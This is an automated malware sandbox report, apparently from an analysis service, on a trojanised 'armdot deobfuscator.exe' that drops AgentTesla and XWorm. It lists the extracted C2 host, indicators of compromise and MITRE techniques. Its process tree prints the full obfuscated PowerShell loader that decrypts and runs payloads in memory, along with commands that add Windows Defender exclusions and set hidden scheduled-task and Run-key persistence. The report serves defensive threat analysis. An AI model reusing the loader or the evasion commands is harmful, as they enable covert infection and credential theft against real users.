agenttesla | 39508b75635805ff4fa5eaf8c7aa926529b66ae52f08460d41d8d960e75385e3

Resubmissions

11-09-2024 00:01

240911-aa691stare 10

10-09-2024 23:54

240910-3ya6ps1fjn 10

Analysis

max time kernel
149s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
11-09-2024 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tool/armdot deobfuscator.exe
Size

275KB
MD5

2bce10bc9bf1c5e013965c7a60deae05
SHA1

7efa1765b1842f4ce9e746c26c7d8394ad7820ce
SHA256

5e74f08923fec3a5daf99b9a6c0763b21a98226f90c537235408a4258389ca01
SHA512

fbfadeb3f983cc76478864de82952ce34cb7543743a3421151827c5a8226d24ddff2409f71230dfc4bbfad441cea9a148a11a31c16e3890cd5a0797fe4a9e7c0
SSDEEP

6144:IwDHUsnM9rwQCz8vRtKT2OyD0Ek+c9NWtO5MxRxLJcNfZ:IAjMnZtgbyD0wyWtOcJeZ

Score

10^/10

agenttesla xworm discovery execution keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:41594

internal-bachelor.gl.at.ply.gg:41594

Mutex

JgIYtyxyvTKZt7Bf

Attributes

Install_directory
%LocalAppData%
install_file
svchost.exe

aes.plain

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral4/memory/4764-83-0x0000000007100000-0x0000000007110000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 1 IoCs

resource	yara_rule
behavioral4/memory/1504-107-0x0000000005ED0000-0x00000000060E4000-memory.dmp	family_agenttesla

Blocklisted process makes network request 4 IoCs

flow	pid	Process
21	4764	powershell.exe
40	4764	powershell.exe
59	4764	powershell.exe
70	4764	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3736	powershell.exe
1796	powershell.exe
4940	powershell.exe
712	powershell.exe
4764	powershell.exe
5064	powershell.exe
4024	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	armdot deobfuscator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
924	cmd.exe
1504	Armdot Deobf.exe
3756	svchost.exe
1564	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	armdot deobfuscator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Armdot Deobf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Armdot Deobf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Armdot Deobf.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Armdot Deobf.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133704865689321799"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3796	schtasks.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
5064	powershell.exe
5064	powershell.exe
4024	powershell.exe
4024	powershell.exe
4764	powershell.exe
4764	powershell.exe
3736	powershell.exe
3736	powershell.exe
1796	powershell.exe
1796	powershell.exe
4940	powershell.exe
4940	powershell.exe
712	powershell.exe
712	powershell.exe
4764	powershell.exe
2216	chrome.exe
2216	chrome.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
3756	svchost.exe
3756	svchost.exe
3756	svchost.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
1564	svchost.exe
1564	svchost.exe
1564	svchost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeIncreaseQuotaPrivilege	4024	powershell.exe
Token: SeSecurityPrivilege	4024	powershell.exe
Token: SeTakeOwnershipPrivilege	4024	powershell.exe
Token: SeLoadDriverPrivilege	4024	powershell.exe
Token: SeSystemProfilePrivilege	4024	powershell.exe
Token: SeSystemtimePrivilege	4024	powershell.exe
Token: SeProfSingleProcessPrivilege	4024	powershell.exe
Token: SeIncBasePriorityPrivilege	4024	powershell.exe
Token: SeCreatePagefilePrivilege	4024	powershell.exe
Token: SeBackupPrivilege	4024	powershell.exe
Token: SeRestorePrivilege	4024	powershell.exe
Token: SeShutdownPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeSystemEnvironmentPrivilege	4024	powershell.exe
Token: SeRemoteShutdownPrivilege	4024	powershell.exe
Token: SeUndockPrivilege	4024	powershell.exe
Token: SeManageVolumePrivilege	4024	powershell.exe
Token: 33	4024	powershell.exe
Token: 34	4024	powershell.exe
Token: 35	4024	powershell.exe
Token: 36	4024	powershell.exe
Token: SeIncreaseQuotaPrivilege	4024	powershell.exe
Token: SeSecurityPrivilege	4024	powershell.exe
Token: SeTakeOwnershipPrivilege	4024	powershell.exe
Token: SeLoadDriverPrivilege	4024	powershell.exe
Token: SeSystemProfilePrivilege	4024	powershell.exe
Token: SeSystemtimePrivilege	4024	powershell.exe
Token: SeProfSingleProcessPrivilege	4024	powershell.exe
Token: SeIncBasePriorityPrivilege	4024	powershell.exe
Token: SeCreatePagefilePrivilege	4024	powershell.exe
Token: SeBackupPrivilege	4024	powershell.exe
Token: SeRestorePrivilege	4024	powershell.exe
Token: SeShutdownPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeSystemEnvironmentPrivilege	4024	powershell.exe
Token: SeRemoteShutdownPrivilege	4024	powershell.exe
Token: SeUndockPrivilege	4024	powershell.exe
Token: SeManageVolumePrivilege	4024	powershell.exe
Token: 33	4024	powershell.exe
Token: 34	4024	powershell.exe
Token: 35	4024	powershell.exe
Token: 36	4024	powershell.exe
Token: SeIncreaseQuotaPrivilege	4024	powershell.exe
Token: SeSecurityPrivilege	4024	powershell.exe
Token: SeTakeOwnershipPrivilege	4024	powershell.exe
Token: SeLoadDriverPrivilege	4024	powershell.exe
Token: SeSystemProfilePrivilege	4024	powershell.exe
Token: SeSystemtimePrivilege	4024	powershell.exe
Token: SeProfSingleProcessPrivilege	4024	powershell.exe
Token: SeIncBasePriorityPrivilege	4024	powershell.exe
Token: SeCreatePagefilePrivilege	4024	powershell.exe
Token: SeBackupPrivilege	4024	powershell.exe
Token: SeRestorePrivilege	4024	powershell.exe
Token: SeShutdownPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeSystemEnvironmentPrivilege	4024	powershell.exe
Token: SeRemoteShutdownPrivilege	4024	powershell.exe
Token: SeUndockPrivilege	4024	powershell.exe
Token: SeManageVolumePrivilege	4024	powershell.exe
Token: 33	4024	powershell.exe
Token: 34	4024	powershell.exe
Token: 35	4024	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe
2216	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4764	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4816 wrote to memory of 4992	4816	armdot deobfuscator.exe	85
PID 4816 wrote to memory of 4992	4816	armdot deobfuscator.exe	85
PID 4816 wrote to memory of 4992	4816	armdot deobfuscator.exe	85
PID 4992 wrote to memory of 5064	4992	cmd.exe	88
PID 4992 wrote to memory of 5064	4992	cmd.exe	88
PID 4992 wrote to memory of 5064	4992	cmd.exe	88
PID 5064 wrote to memory of 4024	5064	powershell.exe	93
PID 5064 wrote to memory of 4024	5064	powershell.exe	93
PID 5064 wrote to memory of 4024	5064	powershell.exe	93
PID 5064 wrote to memory of 4072	5064	powershell.exe	97
PID 5064 wrote to memory of 4072	5064	powershell.exe	97
PID 5064 wrote to memory of 4072	5064	powershell.exe	97
PID 4072 wrote to memory of 2808	4072	WScript.exe	98
PID 4072 wrote to memory of 2808	4072	WScript.exe	98
PID 4072 wrote to memory of 2808	4072	WScript.exe	98
PID 2808 wrote to memory of 4764	2808	cmd.exe	100
PID 2808 wrote to memory of 4764	2808	cmd.exe	100
PID 2808 wrote to memory of 4764	2808	cmd.exe	100
PID 4764 wrote to memory of 924	4764	powershell.exe	103
PID 4764 wrote to memory of 924	4764	powershell.exe	103
PID 4764 wrote to memory of 1504	4764	powershell.exe	104
PID 4764 wrote to memory of 1504	4764	powershell.exe	104
PID 4764 wrote to memory of 1504	4764	powershell.exe	104
PID 4764 wrote to memory of 3736	4764	powershell.exe	106
PID 4764 wrote to memory of 3736	4764	powershell.exe	106
PID 4764 wrote to memory of 3736	4764	powershell.exe	106
PID 4764 wrote to memory of 1796	4764	powershell.exe	108
PID 4764 wrote to memory of 1796	4764	powershell.exe	108
PID 4764 wrote to memory of 1796	4764	powershell.exe	108
PID 4764 wrote to memory of 4940	4764	powershell.exe	110
PID 4764 wrote to memory of 4940	4764	powershell.exe	110
PID 4764 wrote to memory of 4940	4764	powershell.exe	110
PID 4764 wrote to memory of 712	4764	powershell.exe	112
PID 4764 wrote to memory of 712	4764	powershell.exe	112
PID 4764 wrote to memory of 712	4764	powershell.exe	112
PID 4764 wrote to memory of 3796	4764	powershell.exe	114
PID 4764 wrote to memory of 3796	4764	powershell.exe	114
PID 4764 wrote to memory of 3796	4764	powershell.exe	114
PID 2216 wrote to memory of 4068	2216	chrome.exe	120
PID 2216 wrote to memory of 4068	2216	chrome.exe	120
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121
PID 2216 wrote to memory of 2900	2216	chrome.exe	121

C:\Users\Admin\AppData\Local\Temp\tool\armdot deobfuscator.exe
"C:\Users\Admin\AppData\Local\Temp\tool\armdot deobfuscator.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\crypt2.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\crypt2.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\crypt2.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5064
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_618_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_618.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4024
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_618.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4072
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_618.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2808
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_618.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_618.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4764
        
        C:\Users\Admin\AppData\Local\Temp\tool\cmd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tool\cmd.exe"
        7⤵
        Executes dropped EXE
        
        PID:924
        
        C:\Users\Admin\AppData\Local\Temp\tool\Armdot Deobf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tool\Armdot Deobf.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:1504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:712
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Local\svchost.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc5c21cc40,0x7ffc5c21cc4c,0x7ffc5c21cc58
  2⤵
  PID:4068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1972,i,421214848583369826,11944333761024955632,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1968 /prefetch:2
  2⤵
  PID:2900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2060,i,421214848583369826,11944333761024955632,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2236 /prefetch:3
  2⤵
  PID:4580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,421214848583369826,11944333761024955632,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2308 /prefetch:8
  2⤵
  PID:3236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,421214848583369826,11944333761024955632,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3188 /prefetch:1
  2⤵
  PID:1392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,421214848583369826,11944333761024955632,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3204 /prefetch:1
  2⤵
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4652,i,421214848583369826,11944333761024955632,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4632 /prefetch:1
  2⤵
  PID:808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,421214848583369826,11944333761024955632,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4904 /prefetch:8
  2⤵
  PID:4040
- C:\Program Files\Google\Chrome\Application\chrome.exe
